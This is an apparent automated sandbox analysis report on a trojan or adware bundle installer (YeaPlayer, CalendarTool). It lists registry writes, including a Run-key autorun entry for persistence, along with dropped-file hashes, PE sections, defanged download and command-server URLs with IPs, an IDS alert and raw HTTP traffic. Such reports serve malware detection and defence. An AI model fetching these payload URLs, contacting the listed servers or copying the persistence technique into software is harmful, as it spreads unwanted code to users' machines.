[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Rpc]
"UuidSequenceNumber" = "11665867"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKU\.DEFAULT\Software\Baidu\BHipsDR]
"CtrlBitMap" = "00"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\CalendarServ\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "34 F0 57 68 43 87 DA 97 3C 50 9C 21 7B C7 3B 8D"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKU\.DEFAULT\Software\Baidu\BHipsDR]
"LastTime" = "DD 07 02 00 04 00 0E 00 00 00 37 00 2F 00 4E 00"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\CalendarServ\DEBUG]
"Trace Level"

The process CalendarServ.exe:3156 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 14 96 58 67 41 95 FE A7 81 FB 51 2E 1E 13 10"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process yeaplayer_br_ibd_bundle.exe:2328 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 45 65 90 9A E8 C2 71 59 26 A1 F2 1D 50 4D F2"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\yeaplayer_br_ibd_bundle\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\yeaplayer_br_ibd_bundle\DEBUG]
"Trace Level"

The process %original file name%.exe:1216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 8C 0D 80 C2 D3 53 35 30 EA 5C ED D1 F0 F7 60"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\setup.exe,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The process rundll32.exe:1976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F 3E 9C E2 0A 29 4F 57 B5 73 9E 76 B4 F6 BB DF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@shdoclc.dll,-880" = "Internet Explorer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9319"

The process setup.exe:1948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 D7 F5 33 3D DF 65 5C AB A2 6D 5A AF 6D C0 7B"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"YeaInstaller" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\setup.exe"

The process setup.exe:348 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 D2 CB 94 B8 DC 70 D4 E9 9C 81 6D C4 B7 FD 52"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKCU\Software\YeaInstaller]
"TmN" = "51486"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The process Calendar.exe:3428 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8B 0F BF 8E E9 62 87 0D FD B2 6B B4 CC 3F 9B CD"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process 291734.exe:2712 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 E9 B4 94 AC 7E 2F E5 91 4F E3 E6 87 51 84 4D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\DtsEncodeTools]
"{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}" = "{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

MD5 File path
41079c5f52bdaae924b668f58848f7ea c:\Documents and Settings\"%CurrentUserName%"\Application Data\YeaPlayer_br_IBD_Bundle.exe
41079c5f52bdaae924b668f58848f7ea c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\11082\YeaPlayer_br_IBD_Bundle.exe
9202f096accb0e5dabc4de57365a1bf4 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\setup.exe
d847ccf62c349453393ec8042ffddd95 c:\Program Files\CalendarTool\2.0.0.11189\CalendarEntry.dll
63bbff06febbdf113c94c426396430c8 c:\Program Files\CalendarTool\2.0.0.11189\CalendarServ.exe
598c72aba0b2afc46f1b85b8ffa003e3 c:\Program Files\CalendarTool\2.0.0.11189\CrashReport.exe
4a42c7920e2c2978d862544832b967ab c:\Program Files\CalendarTool\2.0.0.11189\CrashUL.exe
a5a91a90602dc58562c8c311e1e8b019 c:\Program Files\CalendarTool\2.0.0.11189\EVPDR.dll
326fa0636ae763210d7d6e2cc5619be8 c:\Program Files\CalendarTool\2.0.0.11189\EVPHelp.dll
2064fea63e5501e2cde3af77de07e1ab c:\Program Files\CalendarTool\2.0.0.11189\EVPKernel.dll
6aa6f72365d13397f8d9e6cb5e8707fd c:\Program Files\CalendarTool\2.0.0.11189\EVPNet.dll
73e5bd50fd3af7a7a24a73bf279282f0 c:\Program Files\CalendarTool\2.0.0.11189\EVPTask.dll
4cfc9da8e06cdf64e411759b6eb82ab8 c:\Program Files\CalendarTool\2.0.0.11189\InstallHelper.exe
b8f50f062002e67901b134ae536907e9 c:\Program Files\CalendarTool\2.0.0.11189\Report.exe
c56db1a95947290eedea6fb6b7b5267a c:\Program Files\CalendarTool\2.0.0.11189\calendar.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 24124 24576 4.45853 1a13b408c917b27c9106545148d3b8d3
.rdata 28672 4714 5120 3.46982 921acf8cb0aea87c0603fa899765fcc2
.data 36864 154936 1536 2.97482 797517c6ef57aa95d53df2cf07568953
.ndata 192512 32768 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 225280 48696 49152 4.32483 23edce385f432ed492f596e7da74f1f9

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://xiaobingdou.com/anzhuang.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDM0QTgwQkI4OUI1QTIxODYwRjFBQjM1RjIwMThCOUYyMTkzQjZFODExM0U2MENDMjc5NERDNDQwM0EzNzVGNzZCODJCODdDRUJGMkEwNUEwQjU4MDVBMzYxRjE5QkFBRkY= 23.88.167.250
hxxp://int.dpool.sina.com.cn/iplookup/iplookup.php 180.149.136.219
hxxp://xiaobingdou.com/anzhuang.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDMzMUQzQ0VBQTM1RUNEMDQ2MkQ0Q0Q3MjA5QzgzMTI2NzUwN0E1M0FGRkQ4RjlEMTk1OTVDNDg1MDUwMTkwMEFGNDc2OTBGOUUzMUU3NTREMTE3RkJBM0I4RDA0NkE5QjA= 23.88.167.250
hxxp://xiaobingdou.com/jihuo.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUVBQkJBMzMzMzEwNjZEMjZGQzNDMkMwREI0MTIwQ0ZGNDlERjNDNUIyNjgwNjZGRDczQzBCMjQzQjg2RTMzNUIxMkYwQzU4NzY3NzQxQTNDNjc3MEM4M0JFRjlEMkZCNUEyRDA1RTU0OThBQ0Q2QTg2NjlDRTkyMDEyMjkwNzg5 23.88.167.250
hxxp://xiaobingdou.com/online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= 23.88.167.250
hxxp://wsxc123.cc/open/51486.ini 23.82.46.34
hxxp://wsxc123.cc/Setup/51486_a.xml 23.82.46.34
hxxp://xiaobingdou.com/reportInstall.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUVBQkJBMzMzMzEwNjZEMjZGQzNDMkMwREI0MTIwQ0ZGNTEyM0U1Q0FDODhFRjdFN0MxNEE5NkY3NzMxQUNEQTY5RTY0MTEwOEI5MDkyQzg5ODE1NDcxQTQwMUFBRkYxRTFBRDFBOTYyMkZBRkVBMzI4MERBQUNDQ0Y2MTk3OUY3NjRFM0FGNzZFMzc4M0Q1MjJBM0YyRDMzNTBEMDY4MjI= 23.88.167.250
hxxp://xiaobingdou.com/begin.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUIyMDBFNEQ5MkU5RjlEN0UzQjI1NTYxMzcwMzQxOTczRjUxNUI4REIxM0Q4OUQ2MEIzMUM2RTQ4NDU4MkI2MjREOTVFRjI5QTQ0NTg0OUYwNjgyRkVFQjdFMkU4OTNFMg== 23.88.167.250
hxxp://wsxc123.cc/offer/YeaPlayer_br_IBD_Bundle.exe 23.82.46.34
hxxp://xiaobingdou.com/jihuo.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGQzc4RjI1RDExOEU4MTVCNERBQzVDRjM5MEMzMjlCMDM3RTBERTg3QjA3NTQ2ODMyRTQ1NjUyQjkxQzNFQkUyNDJEQTgyMjJCMDJFNzk5Q0Y5MkI2MTE0MTMwNjhBRDBDQkE5RDRGQ0ExMUNFOTc5RUNGRkYwRkE1NUU3QzU2N0ZCOTc0QzA5MjgwNzkzQ0FBMDBFNjk2OUI3NTdBMUFF 23.88.167.250
hxxp://xiaobingdou.com/down.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUIyMDBFNEQ5MkU5RjlEN0UzQjI1NTYxMzcwMzQxOTczMEIwNkU4RDJCMTk4QUU0QUNBQkQxQzM1RTA0QzVBQzU= 23.88.167.250
hxxp://xiaobingdou.com/fail.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUIyMDBFNEQ5MkU5RjlEN0UzQjI1NTYxMzcwMzQxOTczMTdCQzQ1MjI5QjNCODhBNTgzRjExRTk3NzFBOTRCMUE= 23.88.167.250
hxxp://xiaobingdou.com/xiezai.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY4QzMwQkJBRUIwNzA1QTEyNzBDM0RFQTk1OTJDN0ZCMzdDQTY3QzRGN0I0RDA2NDAzMzc0M0IyRTYzQjk0OTY= 23.88.167.250
hxxp://tools-uplog-626660929.us-east-1.elb.amazonaws.com/cgi-bin-py/weather_install.cgi
hxxp://download.toptools100.com.cdngc.net/yeaplayer_br.encrypt
hxxp://com.alibaba.img.cdngc.net/CalendarTool_Setup_En_pure_Release_calendarbase[2015-12-25.16.42].exe
hxxp://tools-uplog-626660929.us-east-1.elb.amazonaws.com/cgi-bin-py/calendar_install.cgi
hxxp://www.theadvancedcalendar.com/cgi-bin-py/calendar_install.cgi 107.23.49.142
hxxp://download.intechnical.online/CalendarTool_Setup_En_pure_Release_calendarbase[2015-12-25.16.42].exe 37.29.13.33
hxxp://www.thedesktopweather.com/cgi-bin-py/weather_install.cgi 107.23.49.142
hxxp://down.hejie123.com/offer/YeaPlayer_br_IBD_Bundle.exe 107.167.14.130
hxxp://download.thedesktopweather.com/yeaplayer_br.encrypt 37.29.13.53
rtp.tools1000.com 52.4.87.212


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Abnormal User-Agent No space after colon - Likely Hostile

Traffic

POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <
<<< skipped >>>


GET /yeaplayer_br.encrypt HTTP/1.1
User-Agent: HTTP_CLIENT
Host: download.thedesktopweather.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 03 May 2016 01:56:00 GMT
Server: PWS/8.1.36
X-Px: ms h0-s1157.v0-mow ( h0-s1063.v0-mow), ms h0-s1063.v0-mow ( h0-s75.p51-icn), ht-d h0-s75.p51-icn.cdngp.net
ETag: "769c03b-f6-529cfae03b180"
Cache-Control: max-age=604800
Expires: Thu, 05 May 2016 20:26:06 GMT
Age: 365394
Content-Length: 246
Content-Type: text/plain
Last-Modified: Thu, 21 Jan 2016 03:27:18 GMT
Connection: keep-alive
............HCT.......................................................
......................................................................
......................................................................
....................................HTTP/1.1 200 OK..Date: Tue, 03 May
 2016 01:56:00 GMT..Server: PWS/8.1.36..X-Px: ms h0-s1157.v0-mow ( h0-
s1063.v0-mow), ms h0-s1063.v0-mow ( h0-s75.p51-icn), ht-d h0-s75.p51-i
cn.cdngp.net..ETag: "769c03b-f6-529cfae03b180"..Cache-Control: max-age
